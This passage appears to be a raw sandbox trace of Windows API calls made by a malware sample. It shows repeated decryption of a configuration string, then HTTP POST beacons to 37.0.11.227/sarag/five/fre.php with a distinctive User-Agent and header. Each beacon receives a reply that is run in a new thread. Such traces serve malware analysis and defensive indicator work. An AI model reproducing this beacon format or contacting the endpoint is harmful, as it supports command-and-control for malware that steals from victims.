(lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.694] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0322.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.695] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.695] GetProcessHeap () returned 0x690000 [0322.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0322.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.697] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0322.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.698] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0322.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.699] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0322.699] GetProcessHeap () returned 0x690000 [0322.699] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0322.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.700] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0322.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.701] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0322.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.703] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0322.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.704] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0322.704] GetProcessHeap () returned 0x690000 [0322.704] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0322.704] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0322.704] GetProcessHeap () returned 0x690000 [0322.704] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0322.704] socket (af=2, type=1, protocol=6) returned 0xb1c [0322.704] connect (s=0xb1c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0322.747] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0322.747] GetProcessHeap () returned 0x690000 [0322.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0322.747] GetProcessHeap () returned 0x690000 [0322.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0322.748] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0322.749] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0322.749] GetProcessHeap () returned 0x690000 [0322.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0322.749] GetProcessHeap () returned 0x690000 [0322.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0322.750] GetProcessHeap () returned 0x690000 [0322.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0322.750] GetProcessHeap () returned 0x690000 [0322.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0322.751] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0322.751] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0322.751] GetProcessHeap () returned 0x690000 [0322.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0322.752] GetProcessHeap () returned 0x690000 [0322.752] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0322.752] send (s=0xb1c, buf=0x6ad508*, len=242, flags=0) returned 242 [0322.756] send (s=0xb1c, buf=0x6aba40*, len=159, flags=0) returned 159 [0322.756] GetProcessHeap () returned 0x690000 [0322.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0322.756] recv (in: s=0xb1c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0322.845] GetProcessHeap () returned 0x690000 [0322.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0322.846] GetProcessHeap () returned 0x690000 [0322.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0322.846] GetProcessHeap () returned 0x690000 [0322.847] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0322.847] GetProcessHeap () returned 0x690000 [0322.847] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0322.847] closesocket (s=0xb1c) returned 0 [0322.849] GetProcessHeap () returned 0x690000 [0322.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0322.849] GetProcessHeap () returned 0x690000 [0322.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0322.849] GetProcessHeap () returned 0x690000 [0322.850] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0322.850] GetProcessHeap () returned 0x690000 [0322.850] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0322.851] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1868) returned 0xb1c [0322.853] Sleep (dwMilliseconds=0xea60) [0322.869] GetProcessHeap () returned 0x690000 [0322.869] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0322.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.871] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0322.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.923] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0322.932] GetProcessHeap () returned 0x690000 [0322.932] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0322.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.933] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0322.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.934] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0322.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.935] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.935] GetProcessHeap () returned 0x690000 [0322.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0322.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.937] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0322.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.938] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0322.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.939] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0322.939] GetProcessHeap () returned 0x690000 [0322.939] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0322.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.940] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0322.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.943] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0322.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.944] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0322.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.945] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0322.946] GetProcessHeap () returned 0x690000 [0322.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0322.946] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0322.946] GetProcessHeap () returned 0x690000 [0322.946] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0322.947] GetProcessHeap () returned 0x690000 [0322.947] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0322.947] GetProcessHeap () returned 0x690000 [0322.948] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0322.948] GetProcessHeap () returned 0x690000 [0322.948] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0322.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.948] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0322.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.956] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0322.962] GetProcessHeap () returned 0x690000 [0322.962] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0322.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.973] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0322.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.974] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0322.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.975] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.975] GetProcessHeap () returned 0x690000 [0322.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0322.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.980] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0322.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.981] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0322.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.982] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0322.982] GetProcessHeap () returned 0x690000 [0322.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0322.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.983] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0322.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.983] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0322.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.987] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0322.987] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.988] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0322.988] GetProcessHeap () returned 0x690000 [0322.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0322.988] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0322.988] GetProcessHeap () returned 0x690000 [0322.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0322.988] socket (af=2, type=1, protocol=6) returned 0xb20 [0322.988] connect (s=0xb20, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0323.018] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0323.018] GetProcessHeap () returned 0x690000 [0323.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0323.018] GetProcessHeap () returned 0x690000 [0323.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0323.019] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0323.019] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0323.020] GetProcessHeap () returned 0x690000 [0323.020] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0323.020] GetProcessHeap () returned 0x690000 [0323.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0323.021] GetProcessHeap () returned 0x690000 [0323.021] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0323.021] GetProcessHeap () returned 0x690000 [0323.021] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0323.022] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0323.022] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0323.022] GetProcessHeap () returned 0x690000 [0323.023] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0323.023] GetProcessHeap () returned 0x690000 [0323.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0323.023] send (s=0xb20, buf=0x6ad508*, len=242, flags=0) returned 242 [0323.024] send (s=0xb20, buf=0x6aba40*, len=159, flags=0) returned 159 [0323.025] GetProcessHeap () returned 0x690000 [0323.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0323.025] recv (in: s=0xb20, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0323.105] GetProcessHeap () returned 0x690000 [0323.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0323.109] GetProcessHeap () returned 0x690000 [0323.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0323.109] GetProcessHeap () returned 0x690000 [0323.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0323.109] GetProcessHeap () returned 0x690000 [0323.110] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0323.110] closesocket (s=0xb20) returned 0 [0323.111] GetProcessHeap () returned 0x690000 [0323.111] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0323.111] GetProcessHeap () returned 0x690000 [0323.111] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0323.112] GetProcessHeap () returned 0x690000 [0323.112] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0323.112] GetProcessHeap () returned 0x690000 [0323.112] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0323.113] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x186c) returned 0xb20 [0323.115] Sleep (dwMilliseconds=0xea60) [0323.119] GetProcessHeap () returned 0x690000 [0323.119] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0323.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.120] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0323.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.126] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0323.134] GetProcessHeap () returned 0x690000 [0323.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0323.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.136] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0323.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.136] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0323.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.137] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0323.137] GetProcessHeap () returned 0x690000 [0323.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0323.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.140] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0323.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.141] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0323.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.142] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0323.142] GetProcessHeap () returned 0x690000 [0323.142] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0323.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.143] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0323.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.144] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0323.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.145] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0323.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.146] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0323.146] GetProcessHeap () returned 0x690000 [0323.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0323.176] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0323.176] GetProcessHeap () returned 0x690000 [0323.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0323.177] GetProcessHeap () returned 0x690000 [0323.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0323.177] GetProcessHeap () returned 0x690000 [0323.178] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0323.178] GetProcessHeap () returned 0x690000 [0323.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0323.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.179] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0323.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.189] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0323.198] GetProcessHeap () returned 0x690000 [0323.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0323.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.199] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0323.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.200] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0323.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.201] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0323.201] GetProcessHeap () returned 0x690000 [0323.202] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0323.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.203] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0323.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.206] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0323.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.207] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0323.207] GetProcessHeap () returned 0x690000 [0323.207] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0323.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.208] 